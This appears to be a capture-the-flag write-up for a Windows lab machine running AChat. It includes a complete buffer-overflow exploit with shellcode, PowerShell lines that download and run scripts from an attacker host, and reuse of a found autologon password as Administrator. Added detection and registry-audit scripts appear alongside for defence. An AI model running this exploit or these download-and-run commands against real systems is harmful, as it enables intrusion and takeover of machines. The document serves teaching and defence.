Nmap scan

PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown

Nmap service scan

nmap -sV -p 9255,9256 10.10.10.74 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 16:51 CDT
Nmap scan report for 10.10.10.74
Host is up (0.047s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
9256/tcp open  achat   AChat chat system

Enumerate known exploits for AChat

searchsploit achat
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                          | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                             | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                   | exploits/php/webapps/24647.txt

searchsploit -m 36025

Looking at the payload in the exploit, it only executes calc.exe; the shellcode was generated with:

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
# Payload size: 512 bytes

We can't use a non-staged payload because its size would be too large for the buffer. Instead we keep windows/exec and give it a PowerShell command that downloads and runs a script of our choice.
Example:

CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell.ps1')\""

With this method the payload size is only 674 bytes.

Checking the buffer size in the exploit: the payload is padded with "A"s up to 1152 bytes, so the 674-byte payload fits.
p += buf + "A" * (1152 - len(buf))

Final exploit

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x6a\x48\x61\x72"
buf += "\x6d\x30\x6b\x50\x4d\x30\x73\x30\x62\x69\x6a\x45\x4e"
buf += "\x51\x77\x50\x30\x64\x64\x4b\x50\x50\x50\x30\x44\x4b"
buf += "\x62\x32\x4a\x6c\x64\x4b\x4f\x62\x6d\x44\x72\x6b\x64"
buf += "\x32\x4f\x38\x6c\x4f\x77\x47\x6d\x7a\x4c\x66\x30\x31"
buf += "\x79\x6f\x54\x6c\x4f\x4c\x30\x61\x73\x4c\x5a\x62\x6e"
buf += "\x4c\x6f\x30\x56\x61\x58\x4f\x6c\x4d\x49\x71\x39\x37"
buf += "\x79\x52\x48\x72\x51\x42\x71\x47\x62\x6b\x70\x52\x6c"
buf += "\x50\x42\x6b\x4d\x7a\x4f\x4c\x54\x4b\x50\x4c\x4a\x71"
buf += "\x72\x58\x37\x73\x30\x48\x6d\x31\x36\x71\x30\x51\x54"
buf += "\x4b\x4f\x69\x6b\x70\x69\x71\x47\x63\x72\x6b\x30\x49"
buf += "\x4c\x58\x57\x73\x4c\x7a\x51\x39\x72\x6b\x6f\x44\x64"
buf += "\x4b\x79\x71\x4a\x36\x4c\x71\x6b\x4f\x56\x4c\x57\x51"
buf += "\x38\x4f\x6a\x6d\x49\x71\x79\x37\x50\x38\x49\x50\x64"
buf += "\x35\x6b\x46\x6b\x53\x33\x4d\x6b\x48\x4d\x6b\x61\x6d"
buf += "\x6c\x64\x54\x35\x39\x54\x30\x58\x74\x4b\x32\x38\x6d"
buf += "\x54\x4a\x61\x58\x53\x6f\x76\x74\x4b\x6a\x6c\x30\x4b"
buf += "\x42\x6b\x30\x58\x4d\x4c\x7a\x61\x46\x73\x32\x6b\x4d"
buf += "\x34\x44\x4b\x49\x71\x5a\x30\x61\x79\x71\x34\x6f\x34"
buf += "\x4b\x74\x61\x4b\x6f\x6b\x30\x61\x6f\x69\x4e\x7a\x70"
buf += "\x51\x49\x6f\x37\x70\x51\x4f\x31\x4f\x4e\x7a\x34\x4b"
buf += "\x4b\x62\x5a\x4b\x52\x6d\x61\x4d\x71\x5a\x5a\x61\x34"
buf += "\x4d\x42\x65\x55\x62\x69\x70\x39\x70\x69\x70\x6e\x70"
buf += "\x53\x38\x4d\x61\x52\x6b\x70\x6f\x64\x47\x79\x6f\x69"
buf += "\x45\x55\x6b\x68\x70\x64\x75\x63\x72\x42\x36\x63\x38"
buf += "\x34\x66\x42\x75\x65\x6d\x55\x4d\x4b\x4f\x47\x65\x4f"
buf += "\x4c\x5a\x66\x33\x4c\x39\x7a\x51\x70\x59\x6b\x59\x50"
buf += "\x53\x45\x6b\x55\x75\x6b\x71\x37\x6a\x73\x52\x52\x62"
buf += "\x4f\x32\x4a\x6b\x50\x72\x33\x69\x6f\x47\x65\x54\x30"
buf += "\x32\x4f\x54\x37\x50\x65\x62\x52\x33\x43\x73\x38\x43"
buf += "\x35\x42\x4c\x32\x4c\x4f\x30\x6b\x72\x4e\x69\x4e\x65"
buf += "\x50\x58\x6d\x58\x4e\x6e\x30\x65\x42\x57\x6c\x6d\x4e"
buf += "\x6f\x6f\x72\x52\x4a\x43\x35\x70\x63\x70\x74\x4f\x30"
buf += "\x4e\x6e\x52\x45\x62\x54\x4e\x4e\x4e\x77\x31\x55\x43"
buf += "\x32\x4e\x63\x50\x6c\x31\x59\x52\x45\x70\x6e\x71\x64"
buf += "\x6e\x49\x6c\x6e\x50\x64\x72\x4f\x31\x67\x62\x4e\x52"
buf += "\x4c\x62\x4f\x4f\x71\x50\x64\x30\x53\x52\x54\x63\x42"
buf += "\x72\x49\x52\x4e\x73\x37\x4d\x58\x6c\x67\x71\x58\x32"
buf += "\x54\x50\x74\x34\x30\x6e\x5a\x4c\x6f\x6e\x4f\x70\x31"
buf += "\x6c\x70\x6e\x4e\x4c\x71\x70\x30\x4e\x4e\x4d\x61\x50"
buf += "\x34\x4e\x4e\x70\x31\x50\x39\x6e\x4f\x32\x53\x50\x68"
buf += "\x6f\x75\x70\x6c\x62\x4c\x6e\x4e\x74\x30\x63\x43\x4c"
buf += "\x71\x6e\x47\x4d\x59\x6d\x52\x4b\x50\x41\x41"

# p (the packet buffer; only its padding line is shown above), sock (a UDP
# socket) and server_address are built earlier in the original 36025.py and
# are not reproduced in this excerpt.
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    # send the buffer in 8192-byte chunks
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
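
As an added detection-side example (not part of the writeup or of the exploit), the datagrams this exploit sends to UDP/9256 are easy to flag: an oversized datagram, a long run of the "A" filler, or the alphanumeric alignment stub that msfvenom's x86/unicode_mixed encoder emits (the "\x50\x50\x59\x41\x49..." = "PPYAI..." bytes at the top of the shellcode above). The port is from the scan; the length and run thresholds and the sample datagrams are assumptions constructed for the example.

```python
# Added example (not from the writeup): flag datagrams to AChat's UDP port that
# have the shape of the overflow above, for an IDS rule or a pcap triage script.
from collections import namedtuple

ACHAT_PORT = 9256        # AChat service port from the nmap scan
MAX_SANE_LEN = 512       # assumption: real chat datagrams are far shorter than the 1152-byte overflow
MIN_FILLER_RUN = 200     # assumption: this many identical bytes in a row is padding, not chat text
# Alignment stub emitted by msfvenom's x86/unicode_mixed encoder; it is the
# first thing in the shellcode above ("\x50\x50\x59\x41\x49..." = "PPYAI...").
UNICODE_STUB = b"PPYAIAIAIAI"

Finding = namedtuple("Finding", "length run has_stub reasons")


def longest_run(data):
    """Length of the longest run of one repeated byte value."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_datagram(dst_port, payload):
    """Return a Finding when a datagram to the AChat port looks like an overflow attempt, else None."""
    if dst_port != ACHAT_PORT:
        return None
    reasons = []
    run = longest_run(payload)
    stub = UNICODE_STUB in payload
    if len(payload) > MAX_SANE_LEN:
        reasons.append("oversized datagram (%d bytes)" % len(payload))
    if run >= MIN_FILLER_RUN:
        reasons.append("filler run of %d identical bytes" % run)
    if stub:
        reasons.append("unicode_mixed encoder stub present")
    return Finding(len(payload), run, stub, reasons) if reasons else None


# Constructed samples: a normal chat message and an exploit-shaped datagram
# (encoder stub followed by "A" padding, mirroring the layout shown above).
BENIGN = b"hello from alfred"
EXPLOIT_SHAPED = b"PPYAIAIAIAIAIAIAIAI" + b"A" * 1100

if __name__ == "__main__":
    for name, data in (("benign", BENIGN), ("exploit-shaped", EXPLOIT_SHAPED)):
        print(name, inspect_datagram(ACHAT_PORT, data))
```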

user.txt 72290246df<redacted>

Privesc

See what groups and privileges our token has

whoami /all

USER INFORMATION
----------------

User Name         SID                                          
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Loading PowerUp into memory:
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/PowerUp.ps1')

Now that PowerUp is loaded into memory, we can call it from our shell:
Invoke-AllChecks

[*] Checking for Autologon credentials in registry...
DefaultDomainName    :
DefaultUserName      : Alfred
DefaultPassword      : Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

Convert the password to a SecureString and build a PSCredential, trying the same password for the Administrator account:

$SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)
$cred

UserName                                                               Password
--------                                                               --------
Administrator                                      System.Security.SecureString

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell2.ps1')" -Credential $cred

root.txt a673d1b1fa95c<redacted>
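
An added audit for the autologon finding above, written in Python to match the rest of this page's code (it is not PowerUp's code): it reads the same Winlogon values PowerUp prints and tells a clear-text DefaultPassword, readable by any local user, apart from a password kept as an LSA secret. The registry path and value names are the standard Winlogon ones; the sample dict mirrors the PowerUp output above and is constructed for the example.

```python
# Added example (not PowerUp's code): audit the Winlogon autologon values that
# PowerUp's check reads, and report where the password actually lives.
import sys

WINLOGON_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# AutoAdminLogon is the switch that enables autologon; the other six are the values PowerUp prints.
VALUE_NAMES = ("AutoAdminLogon", "DefaultDomainName", "DefaultUserName", "DefaultPassword",
               "AltDefaultDomainName", "AltDefaultUserName", "AltDefaultPassword")


def read_winlogon_values():
    """Read the values from HKLM (Windows only). Standard users can read this key,
    which is why PowerUp finds the password without admin rights."""
    import winreg  # Windows-only module, so imported lazily
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_PATH) as key:
        for name in VALUE_NAMES:
            try:
                values[name] = str(winreg.QueryValueEx(key, name)[0])
            except FileNotFoundError:  # value not present
                pass
    return values


def audit_autologon(values):
    """Return a list of findings for a dict of Winlogon values; empty means nothing to fix."""
    findings = []
    enabled = values.get("AutoAdminLogon", "0").strip() == "1"
    for pw_name, user_name in (("DefaultPassword", "DefaultUserName"),
                               ("AltDefaultPassword", "AltDefaultUserName")):
        if values.get(pw_name):
            findings.append("%s holds a clear-text password for '%s' that any local user can read"
                            % (pw_name, values.get(user_name, "?")))
    if enabled and not values.get("DefaultPassword"):
        # Sysinternals Autologon keeps the password as an LSA secret instead, readable only by admins.
        findings.append("AutoAdminLogon=1 without DefaultPassword: password is kept as an LSA secret")
    if enabled:
        findings.append("Autologon is enabled for '%s': disable it, or make sure the password is not "
                        "shared with privileged accounts" % values.get("DefaultUserName", "?"))
    return findings


# Constructed sample mirroring the PowerUp output above.
SAMPLE = {"AutoAdminLogon": "1", "DefaultDomainName": "", "DefaultUserName": "Alfred",
          "DefaultPassword": "Welcome1!", "AltDefaultDomainName": "", "AltDefaultUserName": "",
          "AltDefaultPassword": ""}

if __name__ == "__main__":
    values = read_winlogon_values() if sys.platform == "win32" else SAMPLE
    for line in audit_autologon(values) or ["no autologon issues found"]:
        print(line)
```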

An alternative method is to modify the ACL of root.txt with cacls.exe, after inspecting it with Get-Acl:

Get-Acl root.txt | fl *

cacls root.txt /t /e /p Alfred:F